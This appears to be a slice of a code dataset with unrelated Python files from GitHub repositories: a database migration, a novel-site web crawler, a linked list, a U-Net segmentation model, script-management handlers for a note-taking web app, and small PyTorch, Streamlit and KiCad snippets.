'cambioContraseña',\n existing_type=sa.BOOLEAN(),\n nullable=False)\n op.add_column('medico', sa.Column('contrasena', sa.VARCHAR(length=100), autoincrement=False, nullable=False))\n op.add_column('hospital', sa.Column('contrasena', sa.VARCHAR(length=100), autoincrement=False, nullable=False))\n op.alter_column('hospital', 'cambioContraseña',\n existing_type=sa.BOOLEAN(),\n nullable=False)\n # ### end Alembic commands ###\n","repo_name":"joscanoga/gestion-de-historia-clinica-centralizada","sub_path":"migrations/versions/26b1831151f9_.py","file_name":"26b1831151f9_.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30792269296","text":"import re\n\nimport cchardet\nimport requests\nfrom selenium import webdriver\nfrom tqdm import tqdm\n\nfrom qimaowang.classes.ThreadPool import ThreadPool\n\nul_pattern = re.compile('', re.DOTALL)\nid_pattern = re.compile('')\n\n\ndef get_cookie():\n url = \"https://www.qimao.com/shuku/a-a-a-a-a-a-a-click-1/\"\n driver = webdriver.Chrome()\n driver.get(url)\n cookies = driver.get_cookies()\n return cookies\n\n\ndef get_session(cookies):\n headers = {\n \"Referer\": \"https://www.qimao.com/\",\n \"Host\": \"www.qimao.com\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n \"Cache-Control\": \"max-age=0\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36\"\n }\n session = requests.Session()\n session.headers = headers\n for item in cookies:\n session.cookies.set(item[\"name\"], item[\"value\"])\n return session\n\n\ndef crawl(url, session):\n try:\n r = session.get(url, timeout=12)\n r.raise_for_status()\n encoding = cchardet.detect(r.content)\n r.encoding = encoding[\"encoding\"]\n return r.text\n except Exception as e:\n print(e)\n return \"\"\n\n\ndef get_novel_id(session):\n pages = 666\n url_pattern = \"https://www.qimao.com/shuku/a-a-a-a-a-a-a-click-{}/\"\n id_list = list()\n for i in tqdm(range(pages)):\n html = crawl(url_pattern.format(str(i + 1)), session)\n # time.sleep(0.5)\n if html != \"\":\n ul_tag = ul_pattern.findall(html)\n if len(ul_tag) > 0:\n # id_t = id_pattern.findall(ul_tag[0])\n # print(\"第\" + str(i) + \"页\" + str(len(id_t)))\n id_list.extend(id_pattern.findall(ul_tag[0]))\n return id_list\n\n\ndef main():\n cookies = get_cookie()\n session = get_session(cookies)\n thread_pool = ThreadPool(thread_num=4, cookies=cookies)\n id_list = get_novel_id(session)\n session.close()\n for id_t in id_list:\n thread_pool.put_task(id_t)\n thread_pool.create_and_start_thread()\n thread_pool.wait_all_task_done()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nettik/spiders","sub_path":"internet novel info/qimaowang/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"28843765196","text":"class Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n self.previous = None\r\n\r\nclass doublyLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n def append(self, data):\r\n if self.head is None:\r\n new_node = Node(data)\r\n new_node.previous = None\r\n self.head = new_node\r\n else:\r\n new_node = Node(data)\r\n cur = self.head\r\n while cur.next:\r\n cur = cur.next\r\n cur.next = new_node\r\n new_node.previous = cur\r\n new_node.next = None\r\n def prepend(self, data):\r\n if self.head is None:\r\n new_node = Node(data)\r\n new_node.previous = None\r\n self.head = new_node\r\n else:\r\n new_node = Node(data)\r\n self.head.previous = new_node\r\n new_node.next = self.head\r\n self.head = new_node\r\n new_node.previous = None\r\n def print_list(self):\r\n cur = self.head\r\n while cur:\r\n print(cur.data)\r\n cur = cur.next\r\n def add_after_node(self, key, data):\r\n cur = self.head\r\n while cur:\r\n if cur.next is None and cur.data == key:\r\n self.append(data)\r\n return\r\n elif cur.data == key:\r\n new_node = Node(data)\r\n nxt = cur.next\r\n cur.next = new_node\r\n new_node.previous = cur\r\n new_node.next = nxt\r\n nxt.previous = new_node\r\n cur = cur.next\r\n def add_before_node(self, key, data):\r\n cur = self.head\r\n while cur:\r\n if cur.previous is None and cur.data == key:\r\n self.prepend(data)\r\n return\r\n elif cur.data == key:\r\n new_node = Node(data)\r\n prev = cur.previous\r\n prev.next = new_node\r\n new_node.previous = prev\r\n new_node.next = cur\r\n cur.previous = new_node\r\n cur = cur.next\r\n def delete(self, key):\r\n cur = self.head\r\n while cur:\r\n if cur.data == key and cur == self.head:\r\n # Case 1\r\n if not cur.next:\r\n cur = None\r\n self.head = None\r\n return\r\n # Case 2\r\n else:\r\n nxt = cur.next\r\n cur.next = None\r\n nxt.previous = None\r\n cur = None\r\n self.head = nxt\r\n return\r\n elif cur.data == key:\r\n # Case 3\r\n if cur.next:\r\n nxt = cur.next\r\n prev = cur.previous\r\n prev.next = nxt\r\n nxt.previous = prev\r\n cur.next = None\r\n cur.previous = None\r\n cur = None\r\n return\r\n # Case 4\r\n else:\r\n prev = cur.previous\r\n prev.next = None\r\n cur.previous = None\r\n cur = None\r\n return\r\n cur = cur.next\r\n def reverse(self):\r\n tmp = None\r\n cur = self.head\r\n while cur:\r\n tmp = cur.previous\r\n cur.previous = cur.next\r\n cur.next = tmp\r\n cur = cur.previous\r\n if tmp:\r\n self.head = tmp.previous\r\ndlist = doublyLinkedList()\r\ndlist.append(1)\r\ndlist.append(2)\r\ndlist.append(3)\r\ndlist.append(4)\r\ndlist.prepend(0)\r\ndlist.print_list()\r\nprint(\" \")\r\ndlist.add_after_node(2, 5)\r\ndlist.print_list()\r\nprint(\" \")\r\ndlist.add_before_node(2, 6)\r\ndlist.print_list()\r\nprint(\" \")\r\ndlist.delete(6)\r\ndlist.print_list()\r\nprint(\" \")\r\ndlist.reverse()\r\ndlist.print_list()\r\n","repo_name":"Hariraj1029/DSA","sub_path":"d_linkedList.py","file_name":"d_linkedList.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31129092266","text":"import argparse\n\nimport consts\nimport params\n\n\ndef set_default_path_str(opts):\n user = 'rahul'\n env = 'local'\n dataset_path_str, output_path_str = './data', './output'\n if user == 'rahul':\n if env == 'local':\n dataset_path_str = f'./data/setcover/data/1000_1000/'\n output_path_str = f'./data/setcover/output/1000_10001/'\n elif env == 'cc':\n dataset_path_str = '/scratch/rahulpat/l2b/setcover/data/1000_1000/'\n output_path_str = '/scratch/rahulpat/l2b/setcover/output/1000_1000/'\n elif user == 'md':\n # TODO: set relevant paths\n pass\n\n opts.dataset = dataset_path_str\n opts.output = output_path_str\n\n\ndef get_options(args=None):\n parser = argparse.ArgumentParser(\n description=\"Options for learning to branch\"\n )\n\n parser.add_argument(\n \"--mode\",\n type=int,\n default=consts.BRANCHING,\n help=\"Generate optimal solution, train meta model or do branching\"\n )\n\n parser.add_argument(\n \"--parallel\",\n type=int,\n default=0,\n help=\"Flag to control solving instances in parallel\"\n )\n\n parser.add_argument(\n \"--timelimit\",\n type=int,\n default=200,\n help=\"Solver timelimit in seconds\"\n )\n\n parser.add_argument(\n \"--dataset\",\n type=str,\n help=\"Folder containing lp files of training instances\",\n )\n\n parser.add_argument(\n \"--output\",\n type=str,\n default='./',\n help=\"Folder to the dump the results\"\n )\n\n parser.add_argument(\n \"--strategy\",\n help=\"Branching strategy for solving mip\",\n type=int,\n default=consts.BS_PC\n )\n\n parser.add_argument(\n \"--max_iterations\",\n help=\"Maximum iterations for LP\",\n type=int,\n default=50\n )\n\n parser.add_argument(\n \"--theta\",\n help=\"Number of data samples collected while training meta model\",\n type=int,\n default=params.THETA\n )\n\n parser.add_argument(\n \"--theta2\",\n help=\"Number of data samples collected after warm-starting with meta model\",\n type=int,\n default=params.THETA2\n )\n\n parser.add_argument(\n \"--warm_start\",\n help=\"warm_start setting: 0: no warm-start, 1: averaging, 2: incremental training\",\n type=int,\n default=consts.NONE\n )\n\n parser.add_argument(\n \"--beta\",\n help=\"Number of instances used for training meta-model\",\n type=int,\n default=params.BETA\n )\n\n parser.add_argument(\n \"--instance\",\n help=\"Path to instance lp file\",\n type=str\n )\n # default = \"/scratch/rahulpat/setcover/train/1000_1000/1000_1000_0.lp\"\n\n parser.add_argument(\n \"--seed\",\n help=\"Seed for CPLEX\",\n type=int,\n default=3\n )\n opts = parser.parse_args(args)\n\n if opts.dataset is None:\n set_default_path_str(opts)\n\n return opts\n","repo_name":"alomrani/learning-to-branch","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"26969026182","text":"import skimage.transform as trans\nimport numpy as np\nimport keras\nimport tensorflow as tf\n\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\n\nfrom keras.models import *\nfrom keras.layers import *\n\nfrom keras.optimizers import *\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler, ReduceLROnPlateau,EarlyStopping\nfrom keras import backend as keras\n\ndef unet_sigmoid(pretrained_weights = None,input_size = (256,256,3)):\n from keras.models import Model, load_model, save_model\n from keras.layers import Input, Dropout, BatchNormalization, Activation, Add\n from keras.layers.core import Lambda\n from keras.layers.convolutional import Conv2D, Conv2DTranspose\n from keras.layers.pooling import MaxPooling2D\n from keras.layers.merge import concatenate\n from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\n from keras import backend as K\n from keras import optimizers\n import tensorflow as tf\n from keras.preprocessing.image import array_to_img, img_to_array, load_img\n\n def BatchActivate(x):\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n return x\n\n def convolution_block(x, filters, size, strides=(1,1), padding='same', activation=True):\n x = Conv2D(filters, size, strides=strides, padding=padding)(x)\n if activation==True: x = BatchActivate(x)\n return x\n\n def residual_block(blockInput, num_filters=16, batch_activate=False):\n x = BatchActivate(blockInput)\n x = convolution_block(x, num_filters, (3,3))\n x = convolution_block(x, num_filters, (3,3), activation=False)\n x = Add()([x, blockInput])\n if batch_activate: x = BatchActivate(x)\n return x\n\n # Build Model\n def build_model(input_layer, start_neurons, DropoutRatio=0.5):\n # 101 -> 50\n conv1 = Conv2D(start_neurons*1, (3,3), activation=None, padding='same')(input_layer)\n conv1 = residual_block(conv1, start_neurons*1)\n conv1 = residual_block(conv1, start_neurons*1, True)\n pool1 = MaxPooling2D((2,2))(conv1)\n pool1 = Dropout(DropoutRatio/2)(pool1)\n \n # 50 -> 25\n conv2 = Conv2D(start_neurons*2, (3,3), activation=None, padding='same')(pool1)\n conv2 = residual_block(conv2, start_neurons*2)\n conv2 = residual_block(conv2, start_neurons*2, True)\n pool2 = MaxPooling2D((2,2))(conv2)\n pool2 = Dropout(DropoutRatio)(pool2)\n \n # 25 -> 12\n conv3 = Conv2D(start_neurons*4, (3,3), activation=None, padding='same')(pool2)\n conv3 = residual_block(conv3, start_neurons*4)\n conv3 = residual_block(conv3, start_neurons*4, True)\n pool3 = MaxPooling2D((2,2))(conv3)\n pool3 = Dropout(DropoutRatio)(pool3)\n \n # 12 -> 6\n conv4 = Conv2D(start_neurons*8, (3,3), activation=None, padding='same')(pool3)\n conv4 = residual_block(conv4, start_neurons*8)\n conv4 = residual_block(conv4, start_neurons*8, True)\n pool4 = MaxPooling2D((2,2))(conv4)\n pool4 = Dropout(DropoutRatio)(pool4)\n \n # Middle\n convm = Conv2D(start_neurons*16, (3,3), activation=None, padding='same')(pool4)\n convm = residual_block(convm, start_neurons*16)\n convm = residual_block(convm, start_neurons*16, True)\n \n # 6 -> 12\n deconv4 = Conv2DTranspose(start_neurons*8, (3,3), strides=(2,2), padding='same')(convm)\n uconv4 = concatenate([deconv4, conv4])\n uconv4 = Dropout(DropoutRatio)(uconv4)\n \n uconv4 = Conv2D(start_neurons*8, (3,3), activation=None, padding='same')(uconv4)\n uconv4 = residual_block(uconv4, start_neurons*8)\n uconv4 = residual_block(uconv4, start_neurons*8, True)\n \n # 12 -> 25\n deconv3 = Conv2DTranspose(start_neurons*4, (3,3), strides=(2,2), padding='same')(uconv4)\n print(f\"deconv3 {deconv3.shape} - {start_neurons*4}\")\n print(f\"conv3 {conv3.shape}\")\n uconv3 = concatenate([deconv3, conv3])\n uconv3 = Dropout(DropoutRatio)(uconv3)\n \n uconv3 = Conv2D(start_neurons*4, (3,3), activation=None, padding='same')(uconv3)\n uconv3 = residual_block(uconv3, start_neurons*4)\n uconv3 = residual_block(uconv3, start_neurons*4, True)\n \n # 25 -> 50\n deconv2 = Conv2DTranspose(start_neurons*2, (3,3), strides=(2,2), padding='same')(uconv3)\n uconv2 = concatenate([deconv2, conv2])\n uconv2 = Dropout(DropoutRatio)(uconv2)\n \n uconv2 = Conv2D(start_neurons*2, (3,3), activation=None, padding='same')(uconv2)\n uconv2 = residual_block(uconv2, start_neurons*2)\n uconv2 = residual_block(uconv2, start_neurons*2, True)\n \n # 50 -> 101\n deconv1 = Conv2DTranspose(start_neurons*1, (3,3), strides=(2,2), padding='same')(uconv2)\n uconv1 = concatenate([deconv1, conv1])\n uconv1 = Dropout(DropoutRatio)(uconv1)\n \n uconv1 = Conv2D(start_neurons*1, (3,3), activation=None, padding='same')(uconv1)\n uconv1 = residual_block(uconv1, start_neurons*1)\n uconv1 = residual_block(uconv1, start_neurons*1, True)\n \n output_layer_noActi = Conv2D(1, (1,1), padding='same', activation=None)(uconv1)\n output_layer = Activation('sigmoid')(output_layer_noActi)\n \n return output_layer\n\n\n input_layer = Input(input_size)\n output_layer = build_model(input_layer, 16,0.5)\n\n model1 = Model(input_layer, output_layer)\n\n c = optimizers.adam(lr = 0.005)\n #model1.compile(loss=\"binary_crossentropy\", optimizer=c, metrics=[my_iou_metric])\n model1.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])\n #model1.summary()\n\n if(pretrained_weights):\n print(f\"MODEL LOADED {pretrained_weights}\")\n model1.load_weights(pretrained_weights)\n\n return model1\n\n\n\n\n\n\n\n###############################################OLD#############################\ndef unet_sigmoid_Old(pretrained_weights = None,input_size = (256,256,3)):\n inputs = Input(input_size)\n conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)\n conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)\n conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)\n conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)\n conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n\n conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)\n conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n\n up6 = Conv2D(512, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5))\n merge6 = concatenate([drop4,up6], axis = 3)\n conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)\n conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv6)\n\n up7 = Conv2D(256, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))\n merge7 = concatenate([conv3,up7], axis = 3)\n conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)\n conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv7)\n\n up8 = Conv2D(128, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))\n merge8 = concatenate([conv2,up8], axis = 3)\n conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)\n conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv8)\n\n up9 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))\n merge9 = concatenate([conv1,up9], axis = 3)\n conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)\n conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)\n conv9 = Conv2D(2, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)\n conv10 = Conv2D(1, 1, activation = 'sigmoid')(conv9)\n\n model = Model(input = inputs, output = conv10)\n\n model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])\n \n #model.summary()\n\n if(pretrained_weights):\n print(f\"MODEL LOADED {pretrained_weights}\")\n model.load_weights(pretrained_weights)\n return model\n\t\n\t\n\t\n\t\n\t\n\t","repo_name":"sofiienko/WeedSegmentation","sub_path":"Server/Unet.py","file_name":"Unet.py","file_ext":"py","file_size_in_byte":9557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"25108727093","text":"# encoding=utf-8\r\n# Created by xupingmao on 2017/05/24\r\n# 系统脚本管理\r\nfrom __future__ import print_function\r\nimport os\r\nimport sys\r\nimport gc\r\nimport web\r\nimport xauth\r\nimport xutils\r\nimport xconfig\r\nimport xtemplate\r\nfrom xutils import u\r\nfrom xutils import six\r\n\r\nSCRIPT_EXT_LIST = (\r\n \".bat\", \r\n \".vbs\", \r\n \".sh\", \r\n \".command\",\r\n \".py\"\r\n)\r\n\r\ntemplate_file = \"system/page/script.html\"\r\n\r\ndef get_default_shell_ext():\r\n if xutils.is_mac():\r\n return \".command\"\r\n elif xutils.is_windows():\r\n return \".bat\"\r\n return \".sh\"\r\n\r\ndef get_script_path(name):\r\n return os.path.join(xconfig.SCRIPTS_DIR, name)\r\n\r\ndef get_script_list():\r\n \"\"\"获取脚本列表\"\"\"\r\n dirname = xconfig.SCRIPTS_DIR\r\n shell_list = []\r\n if os.path.exists(dirname):\r\n for fname in os.listdir(dirname):\r\n fpath = os.path.join(dirname, fname)\r\n if os.path.isfile(fpath) and fpath.endswith(SCRIPT_EXT_LIST):\r\n shell_list.append(fname)\r\n return sorted(shell_list)\r\n\r\nclass SaveHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def POST(self):\r\n name = xutils.get_argument(\"name\")\r\n content = xutils.get_argument(\"content\")\r\n dirname = xconfig.SCRIPTS_DIR\r\n path = os.path.join(dirname, name)\r\n content = content.replace(\"\\r\", \"\")\r\n xutils.savetofile(path, content)\r\n raise web.seeother(\"/system/script/edit?name=\"+xutils.quote(name))\r\n\r\nclass DeleteHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def POST(self):\r\n name = xutils.get_argument(\"name\")\r\n dirname = xconfig.SCRIPTS_DIR\r\n path = os.path.join(dirname, name)\r\n os.remove(path)\r\n raise web.seeother(\"/system/script\")\r\n\r\nclass ExecuteHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def GET(self):\r\n return self.POST()\r\n\r\n @xauth.login_required(\"admin\")\r\n def POST(self):\r\n name = xutils.get_argument(\"name\")\r\n content = xutils.get_argument(\"content\")\r\n arg_path = xutils.get_argument(\"path\")\r\n if content != \"\" and content != None:\r\n dirname = xconfig.SCRIPTS_DIR\r\n path = os.path.join(dirname, name)\r\n content = content.replace(\"\\r\", \"\")\r\n old_content = xutils.readfile(path)\r\n if old_content != content:\r\n xutils.savetofile(path, content)\r\n # 必须调用exec_script因为可能没有保存过程\r\n ret = xutils.exec_script(name, vars = dict(path=arg_path))\r\n return dict(code=\"success\", message=\"\", data=ret)\r\n\r\nclass SearchHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def GET(self):\r\n name = xutils.get_argument(\"name\", \"\")\r\n list = [x for x in get_script_list() if x.find(name) >= 0]\r\n return xtemplate.render(template_file, shell_list = list, name=name)\r\n\r\nclass ListHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def GET(self):\r\n op = xutils.get_argument(\"op\")\r\n name = xutils.get_argument(\"name\", \"\")\r\n error = xutils.get_argument(\"error\", \"\")\r\n dirname = xconfig.SCRIPTS_DIR\r\n\r\n content = \"\"\r\n if op == \"edit\":\r\n content = xutils.readfile(os.path.join(dirname, name))\r\n if op == \"add\" and name != \"\":\r\n path = os.path.join(dirname, name)\r\n basename, ext = os.path.splitext(name)\r\n if ext not in SCRIPT_EXT_LIST:\r\n name = basename + get_default_shell_ext()\r\n path = os.path.join(dirname, name)\r\n if os.path.exists(path):\r\n raise web.seeother(xutils.quote_unicode(\"/system/script_admin?error=%r已存在\" % name))\r\n xutils.touch(path)\r\n\r\n shell_list = get_script_list()\r\n return xtemplate.render(template_file, \r\n op = op,\r\n name = name,\r\n content = content,\r\n shell_list = shell_list,\r\n error = error)\r\n\r\n @xauth.login_required(\"admin\")\r\n def POST(self):\r\n op = xutils.get_argument(\"op\")\r\n name = xutils.get_argument(\"name\", \"\")\r\n dirname = xconfig.SCRIPTS_DIR\r\n path = os.path.join(dirname, name)\r\n # print(op, name)\r\n basename, ext = os.path.splitext(name)\r\n if op == \"add\" and name != \"\":\r\n if ext not in SCRIPT_EXT_LIST:\r\n name = basename + get_default_shell_ext()\r\n path = os.path.join(dirname, name)\r\n if os.path.exists(path):\r\n raise web.seeother(xutils.quote_unicode(\"/system/script_admin?error=%r已存在\" % name))\r\n with open(path, \"wb\") as fp:\r\n pass\r\n elif op == \"save\":\r\n content = xutils.get_argument(\"content\")\r\n content.replace(\"\\r\", \"\")\r\n xutils.savetofile(path, content)\r\n raise web.seeother(\"/system/script_admin\")\r\n\r\nclass EditHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def GET(self):\r\n op = xutils.get_argument(\"op\")\r\n name = xutils.get_argument(\"name\", \"\")\r\n error = xutils.get_argument(\"error\", \"\")\r\n dirname = xconfig.SCRIPTS_DIR\r\n\r\n path = os.path.join(dirname, name)\r\n if not os.path.exists(path):\r\n content = \"\"\r\n else:\r\n content = xutils.readfile(path)\r\n\r\n return xtemplate.render(template_file, \r\n op = \"edit\",\r\n name = name,\r\n content = content,\r\n shell_list = [],\r\n error = error)\r\n\r\nclass RenameHandler:\r\n\r\n @xauth.login_required(\"admin\")\r\n def POST(self):\r\n oldname = xutils.get_argument(\"oldname\")\r\n newname = xutils.get_argument(\"newname\")\r\n oldpath = get_script_path(oldname)\r\n newpath = get_script_path(newname)\r\n if not os.path.exists(oldpath):\r\n return dict(code=\"fail\", message=\"源文件不存在\")\r\n if os.path.exists(newpath):\r\n return dict(code=\"fail\", message=\"目标文件已存在\")\r\n try:\r\n os.rename(oldpath, newpath)\r\n return dict(code=\"success\")\r\n except Exception as e:\r\n return dict(code=\"fail\", message=str(e))\r\n\r\nxurls = (\r\n r\"/system/script\", ListHandler,\r\n r\"/system/script_admin\", ListHandler,\r\n\r\n r\"/system/script/search\", SearchHandler,\r\n\r\n r\"/system/script_admin/edit\", EditHandler,\r\n r\"/system/script/edit\", EditHandler,\r\n \r\n r\"/system/script_admin/save\", SaveHandler,\r\n r\"/system/script/save\", SaveHandler,\r\n\r\n r\"/system/script_admin/execute\", ExecuteHandler,\r\n r\"/system/script/execute\", ExecuteHandler,\r\n\r\n r\"/system/script_admin/delete\", DeleteHandler,\r\n r\"/system/script/delete\", DeleteHandler,\r\n r\"/system/script/rename\", RenameHandler,\r\n)\r\n\r\n\r\n","repo_name":"xupingmao/xnote","sub_path":"handlers/system/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":6736,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"33"} +{"seq_id":"74275574493","text":"import numpy as np\nfrom sklearn.manifold import TSNE\n\ndef plot_embedding(data, label, title):\n x_min, x_max = np.min(data, 0), np.max(data, 0)\n data = (data - x_min) / (x_max - x_min)\n fig = plt.figure()\n #ax = plt.subplot(111)\n for i in range(data.shape[0]):\n plt.text(data[i, 0], data[i, 1], str(label[i]),\n color=plt.cm.Set1((label[i] + 1) / 10.),\n fontdict={'weight': 'bold', 'size': 9})\n plt.xticks([])\n plt.yticks([])\n plt.title(title)\n return fig\n\n\n\ndef tnse():\n output, tSNE_features = model_T(features, adj_T)\n print(\"Generating T-SNE...\")\n tsne = TSNE(n_components=2, init='pca', random_state=0)\n tSNE_result = tsne.fit_transform(tSNE_features.data.cpu().numpy())\n tSNE_label = labels.data.cpu().numpy()\n fig = plot_embedding(tSNE_result, tSNE_label,\n 't-SNE embedding of Cora'\n )\n plt.show(fig)","repo_name":"jarvisWang0903/Utils","sub_path":"tnse.py","file_name":"tnse.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"21031539740","text":"import torch\nimport torch.nn as nn\n\nconv2d_1 = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3, stride=2, padding=1)\nconv2d_2 = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3, stride=2, padding=1)\nx = torch.randn((1, 3, 200, 100))\n\ny = conv2d_1(x)\ny = conv2d_2(y)\n\nprint(y.shape)\n\n\nleakyReLU = torch.nn.LeakyReLU(0.02)\ny = leakyReLU(-torch.ones((2,1)))\nprint(y)\n","repo_name":"ZhangYong19800721/SuperResolution","sub_path":"SR_CycleWGAN/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"3660015129","text":"import streamlit as st\r\n\r\n\r\nst.title(\"Neural Lab Internal Categorization Testing API\")\r\n\r\nm_form = st.form(key = 'form1')\r\n\r\ntitle = m_form.text_input(\"Enter the Title of Article\")\r\n\r\nbody = m_form.text_area(\"Enter the Body of Article\")\r\n\r\nsubmit = m_form.form_submit_button(label = \"Get Categories\")\r\n\r\nif submit:\r\n st.subheader(\"dasdasd\")","repo_name":"qasidali861/qasid","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74664283013","text":"from pcbnew import *\n\nimport sys\nimport os\nimport os.path\nimport re\nimport wx\nimport wx.aui\nimport wx.lib.filebrowsebutton as FBB\n\nWIDGET_SPACING = 5\n\n\noriginal_netlist = {}\nhidden_nets = list()\n\n\ndef get_netlist():\n \"\"\"Create a dict with part ref & pad num as the key and attached net as the value.\"\"\"\n netlist = {}\n for pad in GetBoard().GetPads():\n pad_key = pad.GetParent().GetReference(), pad.GetPadName()\n netlist[pad_key] = pad.GetNetname(), pad.GetNetCode(), pad.IsConnected()\n return netlist\n\n\ndef get_net_names():\n \"\"\"Create a list of all the net names in the PCB.\"\"\"\n return list(set([net[0] for net in get_netlist().values()]))\n\nclass LabelledListBox(wx.BoxSizer):\n \"\"\"ListBox with label.\"\"\"\n\n def __init__(self, parent, label, choices, tooltip=\"\"):\n wx.BoxSizer.__init__(self, wx.HORIZONTAL)\n self.lbl = wx.StaticText(parent=parent, label=label)\n self.lbx = wx.ListBox(\n parent=parent,\n choices=choices,\n style = wx.LB_MULTIPLE | wx.LB_NEEDED_SB | wx.LB_SORT,\n )\n self.lbx.SetToolTip(wx.ToolTip(tooltip))\n self.AddSpacer(WIDGET_SPACING)\n self.Add(self.lbl, 0, wx.ALL | wx.ALIGN_TOP)\n self.AddSpacer(WIDGET_SPACING)\n self.Add(self.lbx, 1, wx.ALL | wx.EXPAND)\n self.AddSpacer(WIDGET_SPACING)\n\n def GetList(self):\n rv = list()\n for i in self.lbx.GetSelections():\n rv.append(self.lbx.GetString(i))\n print(rv)\n return rv\n\n\nclass NetNameDialog(wx.Dialog):\n \"\"\"Class for getting a new net name from the user.\"\"\"\n\n def __init__(self, *args, **kwargs):\n wx.Dialog.__init__(self, None, title=kwargs.get(\"title\"))\n\n panel = wx.Panel(self)\n\n self.name_field = LabelledListBox(\n panel, \"Net Name:\", kwargs.get(\"net_name_choices\"), kwargs.get(\"tool_tip\")\n )\n\n self.ok_btn = wx.Button(panel, label=\"OK\")\n self.cancel_btn = wx.Button(panel, label=\"Cancel\")\n self.ok_btn.Bind(wx.EVT_BUTTON, self.set_net_name, self.ok_btn)\n self.cancel_btn.Bind(wx.EVT_BUTTON, self.cancel, self.cancel_btn)\n\n btn_sizer = wx.BoxSizer(wx.HORIZONTAL)\n btn_sizer.AddSpacer(WIDGET_SPACING)\n btn_sizer.Add(self.ok_btn, 